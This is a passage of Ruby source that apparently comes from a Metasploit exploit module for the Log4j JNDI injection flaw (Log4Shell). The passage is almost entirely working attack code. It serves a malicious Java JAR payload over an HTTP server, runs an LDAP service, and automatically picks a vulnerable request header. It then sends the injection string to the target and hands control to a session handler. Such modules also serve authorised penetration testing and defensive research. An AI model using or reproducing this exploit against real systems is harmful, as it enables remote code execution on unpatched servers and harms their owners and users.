    if target['RemoteLoad']
      build_ldap_search_response_payload_remote(resource_url_string)
    else
      build_ldap_search_response_payload_inline(datastore['JAVA_GADGET_CHAIN'])
    end
  end

  ## HTTP service callbacks
  #
  # Handle HTTP requests and responses
  #
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    vprint_good("Payload requested by #{cli.peerhost} using #{agent}")
    pay = regenerate_payload(cli)
    jar = inject_jar_payload_factory(pay.encoded_jar)
    send_response(cli, 200, 'OK', jar)
  end

  #
  # Create an HTTP response and then send it
  #
  def send_response(cli, code, message = 'OK', html = '')
    proto = Rex::Proto::Http::DefaultProtocol
    res = Rex::Proto::Http::Response.new(code, message, proto)
    res['Content-Type'] = 'application/java-archive'
    res.body = html
    cli.send_response(res)
  end

  def exploit
    validate_configuration!
    if datastore['HTTP_HEADER'].blank?
      targetinfo = (@checkcode&.details || []).reject { |ti| ti[:headers]&.empty? }.first
      http_header = targetinfo[:headers].keys.first if targetinfo
      fail_with(Failure::BadConfig, 'No HTTP_HEADER was specified and none were found automatically') unless http_header

      print_good("Automatically identified vulnerable header: #{http_header}")
    else
      http_header = datastore['HTTP_HEADER']
    end

    # LDAP service
    start_service
    # HTTP service
    if target['RemoteLoad']
      start_http_service('ServerPort' => (datastore['HttpListenerBindPort'].blank? ? datastore['HTTP_SRVPORT'] : datastore['HttpListenerBindPort']).to_i)
    end
    # HTTP request initiator
    send_request_raw(
      'uri' => normalize_uri(target_uri),
      'method' => datastore['HTTP_METHOD'],
      'headers' => { http_header => log4j_jndi_string }
    )
    sleep(datastore['WfsDelay'])
    handler
  ensure
    cleanup
  end

  #
  # Kill HTTP & LDAP services (shut them down and clear resources)
  #
  def cleanup
    # Clean and stop HTTP server
    if @http_service
      begin
        @http_service.remove_resource(datastore['URIPATH'])
        @http_service.deref
        @http_service.stop
        @http_service = nil
      rescue StandardError => e
        print_error("Failed to stop http server due to #{e}")
      end
    end
    super
  end

  def validate_configuration!
    super

    if datastore['HTTP_HEADER'].blank? && !datastore['AutoCheck']
      fail_with(Exploit::Failure::BadConfig, 'Either the AutoCheck option must be enabled or an HTTP_HEADER must be specified.')
    end
  end

  private

  # Boilerplate HTTP service code
  #
  # Returns the configured (or random, if not configured) URI path
  #
  def resource_uri
    path = datastore['URIPATH'] || rand_text_alphanumeric(rand(8..15)) + '.jar'
    path = '/' + path if path !~ %r{^/}
    if path !~ /\.jar$/
      print_status("Appending .jar extension to #{path} as we don't yet serve classpaths")
      path += '.jar'
    end
    datastore['URIPATH'] = path
    return path
  end

  #
  # Handle the HTTP request and return a response.  Code borrowed from:
  # msf/core/exploit/http/server.rb
  #
  def start_http_service(opts = {})
    # Start a new HTTP server
    @http_service = Rex::ServiceManager.start(
      Rex::Proto::Http::Server,
      (opts['ServerPort'] || bindport).to_i,
      opts['ServerHost'] || bindhost,
      datastore['SSL'],
      {
        'Msf' => framework,
        'MsfExploit' => self
      },
      opts['Comm'] || _determine_server_comm(opts['ServerHost'] || bindhost),
      datastore['SSLCert'],
      datastore['SSLCompression'],
      datastore['SSLCipher'],
      datastore['SSLVersion']
    )
    @http_service.server_name = datastore['HTTP::server_name']
    # Default the procedure of the URI to on_request_uri if one isn't
    # provided.
    uopts = {
      'Proc' => method(:on_request_uri),
      'Path' => resource_uri
    }.update(opts['Uri'] || {})
    proto = (datastore['SSL'] ? 'https' : 'http')

    netloc = opts['ServerHost'] || bindhost
    http_srvport = (opts['ServerPort'] || bindport).to_i
    if (proto == 'http' && http_srvport != 80) || (proto == 'https' && http_srvport != 443)
      if Rex::Socket.is_ipv6?(netloc)
        netloc = "[#{netloc}]:#{http_srvport}"
      else
        netloc = "#{netloc}:#{http_srvport}"
      end
    end
    print_status("Serving Java code on: #{proto}://#{netloc}#{uopts['Path']}")

    # Add path to resource
    @service_path = uopts['Path']
    @http_service.add_resource(uopts['Path'], uopts)
  end
end

Read More